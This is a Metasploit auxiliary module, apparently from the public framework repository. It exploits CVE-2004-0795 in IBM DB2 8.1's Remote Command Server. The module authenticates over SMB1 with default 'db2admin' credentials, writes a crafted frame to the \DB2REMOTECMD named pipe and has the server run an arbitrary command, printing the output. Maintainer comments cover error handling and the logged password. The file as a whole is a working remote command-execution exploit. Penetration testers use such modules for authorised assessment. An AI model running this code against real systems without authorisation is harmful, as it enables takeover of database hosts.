GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/db2/db2rcmd.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
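class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client

  # Module metadata and options.
  #
  # The module talks to the DB2 Remote Command Server over an SMB named
  # pipe, authenticating with SMBUser/SMBPass (which fall back to the
  # generic USERNAME/PASSWORD datastore keys) and sending CMD verbatim.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability',
        'Description' => %q{
          This module exploits a vulnerability in the Remote Command Server
          component in IBM's DB2 Universal Database 8.1. An authenticated
          attacker can send arbitrary commands to the DB2REMOTECMD named pipe
          which could lead to administrator privileges.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-0795' ],
          [ 'OSVDB', '4180' ],
          [ 'BID', '9821' ],
        ],
        'DisclosureDate' => '2004-03-04'
      )
    )

    register_options(
      [
        OptString.new('CMD', [ true, 'The command to execute', 'ver']),
        OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin'], fallbacks: ['USERNAME']),
        OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'], fallbacks: ['PASSWORD']),
      ]
    )

    # #run pins the connection to SMB1 (connect(versions: [1])), so the
    # user-facing protocol-version option would be ignored; hide it.
    deregister_options('SMB::ProtocolVersion')
  end

  # Connects over SMB1, authenticates, opens the \DB2REMOTECMD pipe, sends
  # the CMD datastore value using the Remote Command Server's framing and
  # prints whatever the pipe answers.
  #
  # Every failure after the transport is up reports the error and returns;
  # the transport is torn down in an ensure block so a failed pipe write or
  # read no longer leaves the SMB session open.
  def run
    print_status("Connecting to the server...")
    connect(versions: [1])

    begin
      # NOTE(review): this echoes the password into the console/log output.
      # Keep in mind when sharing module output or when logging is enabled.
      print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")

      # Rescue StandardError, not Exception: a Ctrl-C or other non-standard
      # exception must reach the framework rather than be reported here as
      # a login failure.
      begin
        smb_login
      rescue ::StandardError => e
        print_error("Error: #{e}")
        return
      end

      rcmd = datastore['CMD']

      print_status("Connecting to named pipe \\DB2REMOTECMD...")

      # If the pipe doesn't exist (no db2rcmd service), bail.
      begin
        pipe = simple.create_pipe('\\DB2REMOTECMD')
      rescue ::StandardError => e
        print_error("Error: #{e}")
        return
      end

      # Trans2 QUERY_FILE_INFO (subcommand 0x0007) against the pipe's file
      # id with info level 1005. The original module issues this before the
      # command frame; presumably the service requires it -- the reply is
      # not used, so only the side effect is kept.
      simple.client.trans2(0x0007, [pipe.file_id, 1005].pack('vv'), '')

      # Request frame: 32-bit LE value 1, the "DB2" tag, 525 NUL bytes of
      # padding, then the command length as a 32-bit LE integer. That field
      # describes the bytes that follow on the wire, so it is bytesize;
      # String#length counts characters and under-reports any non-ASCII CMD.
      header = [0x00000001].pack('V') + "DB2" + ("\x00" * 525) + [rcmd.bytesize].pack('V')
      pipe.write(header)
      pipe.write(rcmd)

      # Read the response and hand it straight to the operator.
      res = pipe.read
      print_line(res)

      pipe.close
    ensure
      # Always release the SMB session, including on the early returns
      # above and on any exception raised by the pipe I/O.
      disconnect
    end
  end
end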